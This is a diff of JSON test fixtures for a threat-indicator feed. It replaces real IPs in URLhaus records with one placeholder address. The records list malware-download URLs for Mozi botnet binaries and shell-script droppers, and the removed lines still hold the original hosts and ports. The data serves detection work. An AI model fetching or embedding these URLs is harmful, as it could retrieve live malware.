"89.160.20.156", + "full": "http://89.160.20.156:51344/Mozi.a" }, - "ip": "219.156.51.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693222156Z", - "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://219.156.51.117:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"219.156.51.117\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025853Z", + "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://89.160.20.156:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9151,18 +9151,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.234.186.111:40084/Mozi.m", + "original": "http://89.160.20.156:40084/Mozi.m", "scheme": "http", "port": 40084, - "domain": "42.234.186.111", - "full": "http://42.234.186.111:40084/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40084/Mozi.m" }, - "ip": "42.234.186.111" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693226704Z", - "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://42.234.186.111:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.186.111\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025859900Z", + "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://89.160.20.156:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9200,18 +9200,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.73.109:60457/Mozi.m", + "original": "http://89.160.20.156:60457/Mozi.m", "scheme": "http", "port": 60457, - "domain": "58.249.73.109", - "full": "http://58.249.73.109:60457/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60457/Mozi.m" }, - "ip": "58.249.73.109" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693230802Z", - "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://58.249.73.109:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.73.109\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025866800Z", + "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://89.160.20.156:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9249,18 +9249,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.41.5.197:34906/Mozi.a", + "original": "http://89.160.20.156:34906/Mozi.a", "scheme": "http", "port": 34906, - "domain": "27.41.5.197", - "full": "http://27.41.5.197:34906/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34906/Mozi.a" }, - "ip": "27.41.5.197" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693234559Z", - "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://27.41.5.197:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.41.5.197\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025873700Z", + "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://89.160.20.156:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9298,18 +9298,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://176.113.161.71:59847/Mozi.m", + "original": "http://89.160.20.156:59847/Mozi.m", "scheme": "http", "port": 59847, - "domain": "176.113.161.71", - "full": "http://176.113.161.71:59847/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59847/Mozi.m" }, - "ip": "176.113.161.71" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693238086Z", - "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://176.113.161.71:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"176.113.161.71\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025880600Z", + "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://89.160.20.156:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9347,18 +9347,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://122.165.112.82:47873/Mozi.m", + "original": "http://89.160.20.156:47873/Mozi.m", "scheme": "http", "port": 47873, - "domain": "122.165.112.82", - "full": "http://122.165.112.82:47873/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47873/Mozi.m" }, - "ip": "122.165.112.82" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693241412Z", - "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://122.165.112.82:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"122.165.112.82\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025887700Z", + "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://89.160.20.156:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9396,18 +9396,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.12.28:48645/Mozi.m", + "original": "http://89.160.20.156:48645/Mozi.m", "scheme": "http", "port": 48645, - "domain": "125.44.12.28", - "full": "http://125.44.12.28:48645/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48645/Mozi.m" }, - "ip": "125.44.12.28" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693244628Z", - "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://125.44.12.28:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.12.28\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025894500Z", + "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://89.160.20.156:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9445,18 +9445,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.56.112.117:36524/Mozi.a", + "original": "http://89.160.20.156:36524/Mozi.a", "scheme": "http", "port": 36524, - "domain": "120.56.112.117", - "full": "http://120.56.112.117:36524/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36524/Mozi.a" }, - "ip": "120.56.112.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693248225Z", - "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://120.56.112.117:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.56.112.117\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025901400Z", + "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://89.160.20.156:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9494,18 +9494,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.192.227.212:38726/Mozi.m", + "original": "http://89.160.20.156:38726/Mozi.m", "scheme": "http", "port": 38726, - "domain": "117.192.227.212", - "full": "http://117.192.227.212:38726/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38726/Mozi.m" }, - "ip": "117.192.227.212" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693251521Z", - "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://117.192.227.212:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.192.227.212\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025908100Z", + "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://89.160.20.156:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9543,18 +9543,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.209.116:41149/Mozi.m", + "original": "http://89.160.20.156:41149/Mozi.m", "scheme": "http", "port": 41149, - "domain": "120.85.209.116", - "full": "http://120.85.209.116:41149/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41149/Mozi.m" }, - "ip": "120.85.209.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693254887Z", - "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://120.85.209.116:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.209.116\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025916700Z", + "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://89.160.20.156:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9592,18 +9592,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.4.140.121:46993/Mozi.m", + "original": "http://89.160.20.156:46993/Mozi.m", "scheme": "http", "port": 46993, - "domain": "123.4.140.121", - "full": "http://123.4.140.121:46993/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46993/Mozi.m" }, - "ip": "123.4.140.121" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693258193Z", - "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://123.4.140.121:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.140.121\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025924Z", + "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://89.160.20.156:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9641,18 +9641,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.47.246.253:39190/Mozi.m", + "original": "http://89.160.20.156:39190/Mozi.m", "scheme": "http", "port": 39190, - "domain": "125.47.246.253", - "full": "http://125.47.246.253:39190/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39190/Mozi.m" }, - "ip": "125.47.246.253" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693261560Z", - "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://125.47.246.253:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.47.246.253\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025931Z", + "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://89.160.20.156:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9690,18 +9690,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.59.222.67:48344/Mozi.a", + "original": "http://89.160.20.156:48344/Mozi.a", "scheme": "http", "port": 48344, - "domain": "115.59.222.67", - "full": "http://115.59.222.67:48344/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48344/Mozi.a" }, - "ip": "115.59.222.67" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693264746Z", - "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://115.59.222.67:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.59.222.67\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025937900Z", + "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://89.160.20.156:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9740,18 +9740,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://125.133.102.126:58427/bin.sh", + "original": "http://89.160.20.156:58427/bin.sh", "scheme": "http", "port": 58427, - "domain": "125.133.102.126", - "full": "http://125.133.102.126:58427/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58427/bin.sh" }, - "ip": "125.133.102.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693267872Z", - "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://125.133.102.126:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"125.133.102.126\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.025944900Z", + "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://89.160.20.156:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9789,18 +9789,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://115.55.179.98:41921/i", + "original": "http://89.160.20.156:41921/i", "scheme": "http", "port": 41921, - "domain": "115.55.179.98", - "full": "http://115.55.179.98:41921/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41921/i" }, - "ip": "115.55.179.98" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693271078Z", - "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://115.55.179.98:41921/i\",\"url_status\":\"online\",\"host\":\"115.55.179.98\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025951800Z", + "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://89.160.20.156:41921/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9839,18 +9839,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://115.58.39.251:47140/bin.sh", + "original": "http://89.160.20.156:47140/bin.sh", "scheme": "http", "port": 47140, - "domain": "115.58.39.251", - "full": "http://115.58.39.251:47140/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47140/bin.sh" }, - "ip": "115.58.39.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693274234Z", - "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://115.58.39.251:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"115.58.39.251\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025958700Z", + "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://89.160.20.156:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9888,18 +9888,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.3.126.151:34789/Mozi.m", + "original": "http://89.160.20.156:34789/Mozi.m", "scheme": "http", "port": 34789, - "domain": "61.3.126.151", - "full": "http://61.3.126.151:34789/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34789/Mozi.m" }, - "ip": "61.3.126.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693277359Z", - "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://61.3.126.151:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.3.126.151\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025965700Z", + "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://89.160.20.156:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9937,18 +9937,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.94.182.91:37634/Mozi.m", + "original": "http://89.160.20.156:37634/Mozi.m", "scheme": "http", "port": 37634, - "domain": "59.94.182.91", - "full": "http://59.94.182.91:37634/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37634/Mozi.m" }, - "ip": "59.94.182.91" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693280405Z", - "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://59.94.182.91:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.94.182.91\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025972500Z", + "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://89.160.20.156:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9986,18 +9986,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.65:41636/Mozi.m", + "original": "http://89.160.20.156:41636/Mozi.m", "scheme": "http", "port": 41636, - "domain": "58.249.22.65", - "full": "http://58.249.22.65:41636/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41636/Mozi.m" }, - "ip": "58.249.22.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693284413Z", - "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://58.249.22.65:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.65\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025979400Z", + "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://89.160.20.156:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -10035,18 +10035,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": 